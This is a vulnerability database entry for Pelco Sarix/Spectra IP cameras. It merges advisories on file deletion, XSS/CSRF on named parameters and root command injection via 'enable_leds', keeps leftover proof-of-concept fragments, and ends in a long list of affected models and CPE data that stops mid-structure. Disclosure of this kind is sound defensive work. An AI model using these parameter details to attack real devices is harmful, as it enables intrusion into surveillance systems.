Search
Find a vulnerability
Search criteria
ⓘ
Use this form to refine search results.
Full-text search supports keyword queries with ranking and filtering.
You can combine vendor, product, and sources to narrow results.
Enable “Apply ordering” to sort by date instead of relevance.
17 vulnerabilities by pelco
VAR-201905-1022
Vulnerability from variot - Updated: 2023-12-18 12:18A Permissions, Privileges, and Access Control vulnerability exists in the web-based GUI of the 1st Gen Pelco Sarix Enhanced Camera that could allow a remote attacker to delete an arbitrary file. Pelco Sarix Enhanced Camera Contains vulnerabilities related to authorization, permissions, and access control.Information may be tampered with. PelcoSarix/SpectraCameras is a camera from Pelco. SchneiderElectricPelcoSarix/SpectraCameras has multiple cross-site scripting vulnerabilities that an attacker can exploit to execute arbitrary HTML and script code. SchneiderElectric1stGenPelcoSarixEnhancedCamera is a series of fixed IP cameras from Schneider Electric, France. The vulnerability stems from the lack of effective permissions and access control measures for network systems or products. An attacker could exploit the vulnerability to cause a system denial of service. Pelco offers the broadest selection of IP cameras designedfor security surveillance in a wide variety of commercial and industrialsettings. The POST parameter 'enable_leds' locatedin the update() function called via the GeneralSetupController.phpscript is not properly sanitised before being used in writeLedConfig()function to enable led state to on or off. A remote attacker canexploit this issue and execute arbitrary system commands grantingher system access with root privileges using a specially craftedrequest and escape sequence to system shell.Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknownMontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)Lighttpd/1.4.28PHP/5.3.0. Schneider Electric Pelco Sarix/Spectra Cameras Multiple XSS Vulnerabilities
Vendor: Schneider Electric SE Product web page: https://www.pelco.com Affected version: Sarix Enhanced - Model: IME219 (Firmware: 2.1.2.0.8280-A0.0) Sarix Enhanced - Model: IME119 (Firmware: 2.1.2.0.8280-A0.0) Sarix - Model: D5230 (Firmware: 1.9.2.23-20141118-1.9330-A1.10722) Sarix - Model: ID10DN (Firmware: 1.8.2.18-20121109-1.9110-O3.8503) Spectra Enhanced - Model: D6230 (Firmware: 2.2.0.5.9340-A0.0)
Summary: Pelco offers the broadest selection of IP cameras designed for security surveillance in a wide variety of commercial and industrial settings. From our industry-leading fixed and high-speed IP cameras to panoramic, thermal imaging, explosionproof and more, we offer a camera for any environment, any lighting condition and any application. When nothing but the best will do. SarixaC/ Enhanced Range cameras provide the most robust feature-set for your mission-critical applications. With SureVisionaC/ 3.0, Sarix Enhanced delivers the best possible image in difficult lighting conditions such as a combination of bright areas, shaded areas, and intense light. Designed with superior reliability, fault tolerance, and processing speed, these rugged fixed IP cameras ensure you always get the video that you need.
Desc: Pelco cameras suffer from multiple dom-based, stored and reflected XSS vulnerabilities when input passed via several parameters to several scripts is not properly sanitized before being returned to the user.
Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknown MontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980) Lighttpd/1.4.28 PHP/5.3.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience
Advisory ID: ZSL-2017-5415 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5415.php
07.04.2017
--
CSRF/XSS on username parameter:
history.pushState('', '', '/')CSRF/XSS on gateway, hostname, ip_address, nameservers, http_port, rtsp_port and subnet_mask parameter:
history.pushState('', '', '/')CSRF/XSS on version parameter:
history.pushState('', '', '/')CSRF/XSS on device_name, ntp_server, region, smtp_server and zone parameter:
history.pushState('', '', '/')XSS on ftp_base_path, ftp_server, ftp_username, ftp_password and name parameter:
history.pushState('', '', '/') Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201905-1022",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "ime319-1vp",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1es",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1vi",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "d6230",
"scope": "gte",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.11"
},
{
"model": "ime3122-1vi",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1vi",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1vi",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ixes1",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ixe11",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1ei",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-b1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "d6230l",
"scope": "gte",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.11"
},
{
"model": "imes19-1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1ei",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1ep",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-b1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-b1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1ei",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1es",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1vs",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ixe31",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1ep",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1vs",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1vs",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ixe21",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1ei",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "d6220",
"scope": "gte",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.11"
},
{
"model": "ime119-1es",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1vp",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1ep",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1vp",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1vi",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "d6220l",
"scope": "gte",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.11"
},
{
"model": "imes19-1vp",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-b1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1vp",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-b1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1vs",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-b1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1es",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1ep",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1vs",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1es",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1ep",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1ei",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "d6220",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "d6220l",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "d6230",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "d6230l",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "ime119-1i",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "ime119-1p",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "ime119-1s",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "imes19-1i",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "imes19-1p",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "imes19-1s",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "sarix/spectra cameras",
"scope": null,
"trust": 0.6,
"vendor": "pelco",
"version": null
},
{
"model": "electric spectra enhanced model: d6230 2.2.0.5.9340-a0.0",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric sarix model: id10dn 1.8.2.18-20121109-1.9110-o3.8503",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric sarix model: d5230 1.9.2.23-20141118-1.9330-a1.10722",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric sarix enhanced model: ime119 2.1.2.0.8280-a0.0",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric sarix enhanced model: ime219 2.1.2.0.8280-a0.0",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric 1st gen pelco sarix enhanced camera",
"scope": null,
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix enhanced - model: ime219 (firmware: 2.1.2.0.8280-a0.0)"
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix enhanced - model: ime119 (firmware: 2.1.2.0.8280-a0.0)"
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix - model: d5230 (firmware: 1.9.2.23-20141118-1.9330-a1.10722)"
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix - model: id10dn (firmware: 1.8.2.18-20121109-1.9110-o3.8503)"
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "spectra enhanced - model: d6230 (firmware: 2.2.0.5.9340-a0.0)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix enhanced - model: ime219 (firmware: 2.1.2.0.8280-a0.0)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix enhanced - model: ime119 (firmware: 2.1.2.0.8280-a0.0)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix - model: d5230 (firmware: 1.9.2.23-20141118-1.9330-a1.10722)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix - model: id10dn (firmware: 1.8.2.18-20121109-1.9110-o3.8503)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "spectra enhanced - model: d6230 (firmware: 2.2.0.5.9340-a0.0)"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-15702"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015516"
},
{
"db": "NVD",
"id": "CVE-2018-7816"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:d6220_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionStartIncluding": "2.11",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:d6220:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:d6220l_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionStartIncluding": "2.11",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:d6220l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:d6230_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionStartIncluding": "2.11",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:d6230:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:d6230l_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionStartIncluding": "2.11",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:d6230l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imes19-1i_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imes19-1i:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imes19-1s_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imes19-1s:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imes19-1p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imes19-1p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime119-1i_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime119-1i:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime119-1s_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime119-1s:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime119-1p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime119-1p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime219-1i_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime219-1i:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime219-1s_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime219-1s:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime219-1p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime219-1p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-1i_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-1i:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-1s_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-1s:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-1p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-1p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-b1i_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-b1i:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-b1s_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-b1s:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-b1p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-b1p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-1i_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-1i:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-b1i_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-b1i:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-1s_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-1s:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-b1s_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-b1s:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-1p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-1p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
